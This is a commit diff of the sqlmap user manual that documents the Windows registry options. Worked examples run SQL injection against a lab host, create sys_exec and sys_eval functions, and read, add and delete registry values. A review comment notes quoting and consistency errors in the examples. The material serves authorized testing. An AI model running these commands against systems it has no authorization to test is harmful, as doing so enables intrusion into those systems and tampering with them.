Generated new user's manual html and pdf

This commit is contained in:
Bernardo Damele 2010-03-13 22:07:08 +00:00
parent ee89709042
commit bfbf58b04e
2 changed files with 137 additions and 28 deletions


@ -5345,54 +5345,163 @@ meterpreter > exit
<H2><A NAME="ss5.11">5.11</A> <A HREF="#toc5.11">Windows registry access</A> <H2><A NAME="ss5.11">5.11</A> <A HREF="#toc5.11">Windows registry access</A>
</H2> </H2>
<P>It is possible to access Windows registry when the back-end
database management system is either MySQL, PostgreSQL or
Microsoft SQL Server, and when the underlying database layer
supports stacked SQL queries. Also, session user has to have
the needed privileges to access it.</P>
<H3>Read a Windows registry key value</H3> <H3>Read a Windows registry key value</H3>
<P>Option: <CODE>-</CODE><CODE>-reg-read</CODE></P> <P>Option: <CODE>-</CODE><CODE>-reg-read</CODE></P>
<P>TODO</P> <P>Using this option you can read registry key values.</P>
<P>Example on a <B>PostgreSQL 8.4</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-read
<H3>Write a Windows registry key value data</H3> [...]
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: PostgreSQL
[hh:mm:15] [INFO] testing stacked queries support on parameter 'id'
[hh:mm:15] [INFO] detecting back-end DBMS version from its banner
[hh:mm:15] [INFO] retrieved: 8.4.2,
[hh:mm:23] [INFO] the web application supports stacked queries on parameter 'id'
[hh:mm:23] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:23] [INFO] retrieved: 1
[hh:mm:23] [INFO] the back-end DBMS operating system is Windows
[hh:mm:23] [INFO] testing if current user is DBA
[hh:mm:23] [INFO] retrieved: 1
[hh:mm:23] [INFO] checking if UDF 'sys_eval' already exist
[hh:mm:23] [INFO] retrieved: 0
[hh:mm:24] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:24] [INFO] retrieved: 0
[hh:mm:25] [INFO] creating UDF 'sys_eval' from the binary UDF file
[hh:mm:25] [INFO] creating UDF 'sys_exec' from the binary UDF file
which registry key do you want to read? [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\
CurrentVersion]
which registry key value do you want to read? [ProductName]
[hh:mm:34] [INFO] reading Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\ProductName'
[hh:mm:35] [INFO] retrieved: ProductName REG_SZ Microsoft Windows XP
Registry key value data: 'ProductName REG_SZ Microsoft Windows XP'
</PRE>
</CODE></BLOCKQUOTE>
</P>
<H3>Write a Windows registry key value</H3>
<P>Option: <CODE>-</CODE><CODE>-reg-add</CODE></P> <P>Option: <CODE>-</CODE><CODE>-reg-add</CODE></P>
<P>TODO</P> <P>Using this option you can write registry key values.</P>
<P>Example on a <B>PostgreSQL 8.4</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-add
<H3>Delete a Windows registry key value</H3> [...]
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: PostgreSQL
[hh:mm:20] [INFO] testing stacked queries support on parameter 'id'
[hh:mm:20] [INFO] detecting back-end DBMS version from its banner
[hh:mm:20] [INFO] retrieved: 8.4.2,
[hh:mm:29] [INFO] the web application supports stacked queries on parameter 'id'
[hh:mm:29] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:29] [INFO] retrieved: 1
[hh:mm:30] [INFO] the back-end DBMS operating system is Windows
[hh:mm:30] [INFO] testing if current user is DBA
[hh:mm:30] [INFO] retrieved: 1
[hh:mm:30] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:30] [INFO] retrieved: 0
[hh:mm:06] [INFO] creating UDF 'sys_exec' from the binary UDF file
which registry key do you want to write? HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap
which registry key value do you want to write? Test
which registry key value data do you want to write? 1
which registry key value data-type is it? [REG_SZ] REG_DWORD
[hh:mm:41] [INFO] adding Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test'
with data '1'. This will work only if the user running the database process has privileges
to modify the Windows registry.
</PRE>
</CODE></BLOCKQUOTE>
</P>
<H3>Delete a Windows registry key</H3>
<P>Option: <CODE>-</CODE><CODE>-reg-del</CODE></P> <P>Option: <CODE>-</CODE><CODE>-reg-del</CODE></P>
<P>TODO</P> <P>Using this option you can delete registry keys.</P>
<P>Example on a <B>PostgreSQL 8.4</B> target:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-del
[...]
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: PostgreSQL
[hh:mm:20] [INFO] testing stacked queries support on parameter 'id'
[hh:mm:20] [INFO] detecting back-end DBMS version from its banner
[hh:mm:20] [INFO] retrieved: 8.4.2,
[hh:mm:29] [INFO] the web application supports stacked queries on parameter 'id'
[hh:mm:29] [INFO] fingerprinting the back-end DBMS operating system
[hh:mm:29] [INFO] retrieved: 1
[hh:mm:30] [INFO] the back-end DBMS operating system is Windows
[hh:mm:30] [INFO] testing if current user is DBA
[hh:mm:30] [INFO] retrieved: 1
[hh:mm:30] [INFO] checking if UDF 'sys_exec' already exist
[hh:mm:30] [INFO] retrieved: 0
[hh:mm:06] [INFO] creating UDF 'sys_exec' from the binary UDF file
which registry key do you want to delete? HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap
which registry key value do you want to delete? Test
are you sure that you want to delete the Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\
sqlmap\Test? [y/N] y
[hh:mm:26] [INFO] deleting Windows registry path 'HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap\Test'.
This will work only if the user running the database process has privileges to modify the
Windows registry.
</PRE>
</CODE></BLOCKQUOTE>
</P>
<H3>Windows registry key</H3> <H3>Auxiliary registry switches</H3>
<P>Option: <CODE>-</CODE><CODE>-reg-key</CODE></P> <P>Options: <CODE>-</CODE><CODE>-reg-key</CODE>, <CODE>-</CODE><CODE>-reg-value</CODE>,
<CODE>-</CODE><CODE>-reg-data</CODE> and <CODE>-</CODE><CODE>-reg-type</CODE></P>
<P>TODO</P> <P>These switches can be used to provide data needed for proper running of
options <CODE>-</CODE><CODE>-reg-read</CODE>, <CODE>-</CODE><CODE>-reg-add</CODE> and
<CODE>-</CODE><CODE>-reg-del</CODE>. So, instead of providing registry key
information when asked, you can use them at command prompt as program
arguments.</P>
<P>With <CODE>-</CODE><CODE>-reg-key</CODE> option you specify used windows
registry key path, with <CODE>-</CODE><CODE>-reg-value</CODE> value item
name inside provided key, with <CODE>-</CODE><CODE>-reg-data</CODE> value
data, while with <CODE>-</CODE><CODE>-reg-type</CODE> option you specify
type of the value item.</P>
<H3>Windows registry key value</H3> <P>So, another way of running example from option
<CODE>-</CODE><CODE>-reg-add</CODE> could be:</P>
<P>Option: <CODE>-</CODE><CODE>-reg-value</CODE></P> <P>
<BLOCKQUOTE><CODE>
<P>TODO</P> <PRE>
$ python sqlmap.py -u http://172.16.213.128/sqlmap/pgsql/get_int.php?id=1 --reg-add \
--reg-key=HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap --reg-value=Test --reg-type=REG_SZ --reg-data=1
<H3>Windows registry key value data</H3> </PRE>
</CODE></BLOCKQUOTE>
<P>Option: <CODE>-</CODE><CODE>-reg-data</CODE></P> </P>
<P>TODO</P>
<H3>Windows registry key value type</H3>
<P>Option: <CODE>-</CODE><CODE>-reg-type</CODE></P>
<P>TODO</P>
<H2><A NAME="ss5.12">5.12</A> <A HREF="#toc5.12">Miscellaneous</A> <H2><A NAME="ss5.12">5.12</A> <A HREF="#toc5.12">Miscellaneous</A>
</H2> </H2>
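Review bot: the command-line example at the end of the hunk, `--reg-key=HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap`, will not work as typed from a POSIX shell, because an unquoted backslash escapes the following character and is dropped, so the program receives `HKEY_LOCAL_MACHINESOFTWAREsqlmap`; the path should be single-quoted, e.g. `--reg-key='HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap'`, and the same applies to any Windows path passed on the command line. That example also switches the type to `--reg-type=REG_SZ` while the interactive session it claims to reproduce chose `REG_DWORD`, and the `--reg-del` text says the option "can delete registry keys" while the prompts and the log line actually delete a single key value (`...\sqlmap\Test`), so one of the two should be aligned. Minor: the timestamps in the `--reg-add` and `--reg-del` transcripts jump from `[hh:mm:30]` back to `[hh:mm:06]`, and the `--reg-read` transcript still has a stray `<H3>Write a Windows registry key value data</H3>` heading fused into its first output line; the "[...]" lines should stand on their own.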

Binary file not shown.